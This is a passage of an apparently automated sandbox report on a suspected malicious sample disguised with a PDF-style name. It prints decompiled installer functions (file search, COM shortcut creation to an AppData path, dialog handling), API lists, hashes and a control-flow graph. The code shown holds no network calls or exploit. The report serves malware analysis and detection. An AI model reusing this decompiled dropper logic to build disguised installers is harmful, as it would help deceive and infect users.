                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                                      • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                                      • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                                      • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00406555(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426778;
			}




                                                                      0x00406560
                                                                      0x00406569
                                                                      0x00000000
                                                                      0x00406576
                                                                      0x0040656c
                                                                      0x00000000

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(76A63420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,76A63420,?,76A62EE0,00405A23,?,76A63420,76A62EE0), ref: 00406560
                                                                      • FindClose.KERNEL32(00000000), ref: 0040656C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: xgB
                                                                      • API String ID: 2295610775-399326502
                                                                      • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                      • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                                      • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                      • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 67%
                                                                      			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x50)) = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x38)) = E00402C53(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C53(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C53(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C53(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405C3D( *((intOrPtr*)(_t107 - 0x38))) == 0) {
					E00402C53(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, "true", 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x38)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x50)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                      0x0040210d
                                                                      0x00402117
                                                                      0x00402121
                                                                      0x0040212b
                                                                      0x00402136
                                                                      0x00402139
                                                                      0x00402153
                                                                      0x00402156
                                                                      0x0040215c
                                                                      0x0040215f
                                                                      0x00402169
                                                                      0x0040216d
                                                                      0x0040216d
                                                                      0x00402172
                                                                      0x00402183
                                                                      0x0040218b
                                                                      0x00402242
                                                                      0x00402242
                                                                      0x00402249
                                                                      0x00402191
                                                                      0x00402191
                                                                      0x004021a0
                                                                      0x004021a4
                                                                      0x004021a7
                                                                      0x004021ad
                                                                      0x004021bb
                                                                      0x004021be
                                                                      0x004021c0
                                                                      0x004021cb
                                                                      0x004021cb
                                                                      0x004021d0
                                                                      0x004021d2
                                                                      0x004021d9
                                                                      0x004021d9
                                                                      0x004021dc
                                                                      0x004021e5
                                                                      0x004021e8
                                                                      0x004021ee
                                                                      0x004021f0
                                                                      0x004021fa
                                                                      0x004021fa
                                                                      0x004021fd
                                                                      0x00402206
                                                                      0x00402209
                                                                      0x00402212
                                                                      0x00402218
                                                                      0x0040221a
                                                                      0x00402228
                                                                      0x00402228
                                                                      0x0040222b
                                                                      0x00402231
                                                                      0x00402231
                                                                      0x00402234
                                                                      0x0040223a
                                                                      0x00402240
                                                                      0x00402255
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402240
                                                                      0x0040224b
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Deskriptiv155\Hjertere, xrefs: 004021C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Local\Deskriptiv155\Hjertere
                                                                      • API String ID: 542301482-713220995
                                                                      • Opcode ID: e1c6c6b8cf7e3a3f2ade7dd998045e16728aac17930647d79e5fdf4d13565ba9
                                                                      • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                                      • Opcode Fuzzy Hash: e1c6c6b8cf7e3a3f2ade7dd998045e16728aac17930647d79e5fdf4d13565ba9
                                                                      • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 184 403dfe-403e10 185 403f51-403f60 184->185 186 403e16-403e1c 184->186 188 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 185->188 189 403faf-403fc4 185->189 186->185 187 403e22-403e2b 186->187 192 403e40-403e43 187->192 193 403e2d-403e3a SetWindowPos 187->193 188->189 190 404004-404009 call 404322 189->190 191 403fc6-403fc9 189->191 203 40400e-404029 190->203 195 403fcb-403fd6 call 401389 191->195 196 403ffc-403ffe 191->196 198 403e45-403e57 ShowWindow 192->198 199 403e5d-403e63 192->199 193->192 195->196 217 403fd8-403ff7 SendMessageW 195->217 196->190 202 4042a3 196->202 198->199 204 403e65-403e7a DestroyWindow 199->204 205 403e7f-403e82 199->205 210 4042a5-4042ac 202->210 208 404032-404038 203->208 209 40402b-40402d call 40140b 203->209 211 404280-404286 204->211 213 403e84-403e90 SetWindowLongW 205->213 214 403e95-403e9b 205->214 220 404261-40427a DestroyWindow EndDialog 208->220 221 40403e-404049 208->221 209->208 211->202 218 404288-40428e 211->218 213->210 215 403ea1-403eb2 GetDlgItem 214->215 216 403f3e-403f4c call 40433d 214->216 222 403ed1-403ed4 215->222 223 403eb4-403ecb SendMessageW IsWindowEnabled 215->223 216->210 217->210 218->202 225 404290-404299 ShowWindow 218->225 220->211 221->220 226 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 221->226 227 403ed6-403ed7 222->227 228 403ed9-403edc 222->228 223->202 223->222 225->202 254 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 226->254 255 40409e-4040a3 226->255 231 403f07-403f0c call 4042af 227->231 232 403eea-403eef 228->232 233 403ede-403ee4 228->233 231->216 236 403f25-403f38 SendMessageW 232->236 238 403ef1-403ef7 232->238 233->236 237 403ee6-403ee8 233->237 236->216 237->231 242 403ef9-403eff call 40140b 238->242 243 403f0e-403f17 call 40140b 238->243 252 403f05 242->252 243->216 251 403f19-403f23 243->251 251->252 252->231 258 4040e4-4040e5 254->258 259 4040e7 254->259 255->254 260 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 404119-40412a SendMessageW 260->261 262 40412c 260->262 263 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 261->263 262->263 263->203 272 404176-404178 263->272 272->203 273 40417e-404182 272->273 274 4041a1-4041b5 DestroyWindow 273->274 275 404184-40418a 273->275 274->211 277 4041bb-4041e8 CreateDialogParamW 274->277 275->202 276 404190-404196 275->276 276->203 278 40419c 276->278 277->211 279 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->202 279->202 284 404247-40425a ShowWindow call 404322 279->284 286 40425f 284->286 286->211
                                                                      C-Code - Quality: 83%
                                                                      			E00403DFE(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x423710 = _t37;
					if(_t117 == 0x110) {
						 *0x42a248 = _t127;
						 *0x423724 = GetDlgItem(_t127, "true");
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push("true");
						 *0x4216f0 = _t93;
						E004042D6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x42a260;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404322(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a264;
							if(_t41 ==  *0x42a264) {
								E0040140B("true");
							}
							__eflags =  *0x42920c - _t135;
							if( *0x42920c != _t135) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a264; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406234(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004042D6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2cc - _t135;
							_v32 = _t51;
							if( *0x42a2cc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E004042F8(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x4216f0, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push("true");
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, "true");
							__eflags =  *0x42a2cc - _t135;
							if( *0x42a2cc == _t135) {
								_push( *0x423724);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x4216f0);
							}
							E0040430B();
							E00406212(0x423728, 0x429240);
							E00406234(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x423728); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *( *(_t132 + 4) * 4 + "sD@"), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x429218 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004042D6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x42920c - _t135;
									if( *0x42920c != _t135) {
										goto L61;
									}
									ShowWindow( *0x429218, 8); // executed
									E00404322(0x405);
									goto L58;
								}
								__eflags =  *0x42a2cc - _t135;
								if( *0x42a2cc != _t135) {
									goto L61;
								}
								__eflags =  *0x42a2c0 - _t135;
								if( *0x42a2c0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t135;
						EndDialog(_t127,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, "true");
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040433D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2cc - _t135;
										if( *0x42a2cc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x421ef8 = _t129;
										goto L21;
									}
									__eflags =  *0x40a39c - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                      0x00403e07
                                                                      0x00403e10
                                                                      0x00403f51
                                                                      0x00403f55
                                                                      0x00403f59
                                                                      0x00403f5b
                                                                      0x00403f60
                                                                      0x00403f6b
                                                                      0x00403f76
                                                                      0x00403f7b
                                                                      0x00403f7d
                                                                      0x00403f7f
                                                                      0x00403f82
                                                                      0x00403f87
                                                                      0x00403f95
                                                                      0x00403fa2
                                                                      0x00403fa9
                                                                      0x00403fa9
                                                                      0x00403faa
                                                                      0x00403faa
                                                                      0x00403faf
                                                                      0x00403fb5
                                                                      0x00403fbc
                                                                      0x00403fc2
                                                                      0x00403fc4
                                                                      0x00404004
                                                                      0x00404009
                                                                      0x0040400e
                                                                      0x0040400e
                                                                      0x00404013
                                                                      0x0040401c
                                                                      0x0040401e
                                                                      0x00404023
                                                                      0x00404029
                                                                      0x0040402d
                                                                      0x0040402d
                                                                      0x00404032
                                                                      0x00404038
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404043
                                                                      0x00404049
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404052
                                                                      0x0040405a
                                                                      0x0040405f
                                                                      0x00404062
                                                                      0x00404068
                                                                      0x0040406d
                                                                      0x00404070
                                                                      0x00404076
                                                                      0x0040407b
                                                                      0x0040407e
                                                                      0x00404084
                                                                      0x0040408c
                                                                      0x00404092
                                                                      0x00404098
                                                                      0x0040409c
                                                                      0x004040a3
                                                                      0x004040a3
                                                                      0x004040a3
                                                                      0x004040ad
                                                                      0x004040bf
                                                                      0x004040cb
                                                                      0x004040d0
                                                                      0x004040da
                                                                      0x004040e0
                                                                      0x004040e2
                                                                      0x004040e7
                                                                      0x004040e4
                                                                      0x004040e4
                                                                      0x004040e4
                                                                      0x004040f7
                                                                      0x0040410f
                                                                      0x00404111
                                                                      0x00404117
                                                                      0x0040412c
                                                                      0x00404119
                                                                      0x00404122
                                                                      0x00404124
                                                                      0x00404124
                                                                      0x00404132
                                                                      0x00404142
                                                                      0x00404158
                                                                      0x0040415f
                                                                      0x00404165
                                                                      0x00404169
                                                                      0x0040416e
                                                                      0x00404170
                                                                      0x00000000
                                                                      0x00404176
                                                                      0x00404176
                                                                      0x00404178
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040417e
                                                                      0x00404182
                                                                      0x004041a7
                                                                      0x004041ad
                                                                      0x004041b3
                                                                      0x004041b5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004041db
                                                                      0x004041e1
                                                                      0x004041e3
                                                                      0x004041e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004041ee
                                                                      0x004041f1
                                                                      0x004041f4
                                                                      0x0040420b
                                                                      0x00404217
                                                                      0x00404230
                                                                      0x00404236
                                                                      0x0040423a
                                                                      0x0040423f
                                                                      0x00404245
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040424f
                                                                      0x0040425a
                                                                      0x00000000
                                                                      0x0040425a
                                                                      0x00404184
                                                                      0x0040418a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404190
                                                                      0x00404196
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040419c
                                                                      0x00404170
                                                                      0x00404267
                                                                      0x00404273
                                                                      0x0040427a
                                                                      0x00000000
                                                                      0x00403fc6
                                                                      0x00403fc6
                                                                      0x00403fc9
                                                                      0x00403ffc
                                                                      0x00403ffc
                                                                      0x00403ffe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ffe
                                                                      0x00403fcb
                                                                      0x00403fcf
                                                                      0x00403fd4
                                                                      0x00403fd6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403fe6
                                                                      0x00403fee
                                                                      0x00000000
                                                                      0x00403ff4
                                                                      0x00403e22
                                                                      0x00403e22
                                                                      0x00403e26
                                                                      0x00403e2b
                                                                      0x00403e3a
                                                                      0x00403e3a
                                                                      0x00403e43
                                                                      0x00403e4c
                                                                      0x00403e57
                                                                      0x00403e57
                                                                      0x00403e63
                                                                      0x00403e7f
                                                                      0x00403e82
                                                                      0x00403e95
                                                                      0x00403e9b
                                                                      0x00403f3e
                                                                      0x00000000
                                                                      0x00403f47
                                                                      0x00403ea1
                                                                      0x00403eae
                                                                      0x00403eb0
                                                                      0x00403eb2
                                                                      0x00403ed1
                                                                      0x00403ed1
                                                                      0x00403ed4
                                                                      0x00403ed9
                                                                      0x00403edc
                                                                      0x00403eec
                                                                      0x00403eed
                                                                      0x00403eef
                                                                      0x00403f25
                                                                      0x00403f38
                                                                      0x00000000
                                                                      0x00403f38
                                                                      0x00403ef1
                                                                      0x00403ef7
                                                                      0x00403f10
                                                                      0x00403f15
                                                                      0x00403f17
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403f19
                                                                      0x00403f05
                                                                      0x00403f05
                                                                      0x00403f07
                                                                      0x00403f07
                                                                      0x00000000
                                                                      0x00403f07
                                                                      0x00403efa
                                                                      0x00403eff
                                                                      0x00000000
                                                                      0x00403eff
                                                                      0x00403ede
                                                                      0x00403ee4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ee6
                                                                      0x00000000
                                                                      0x00403ee6
                                                                      0x00403ed6
                                                                      0x00000000
                                                                      0x00403ed6
                                                                      0x00403ebc
                                                                      0x00403ec3
                                                                      0x00403ec9
                                                                      0x00403ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ecb
                                                                      0x00403e87
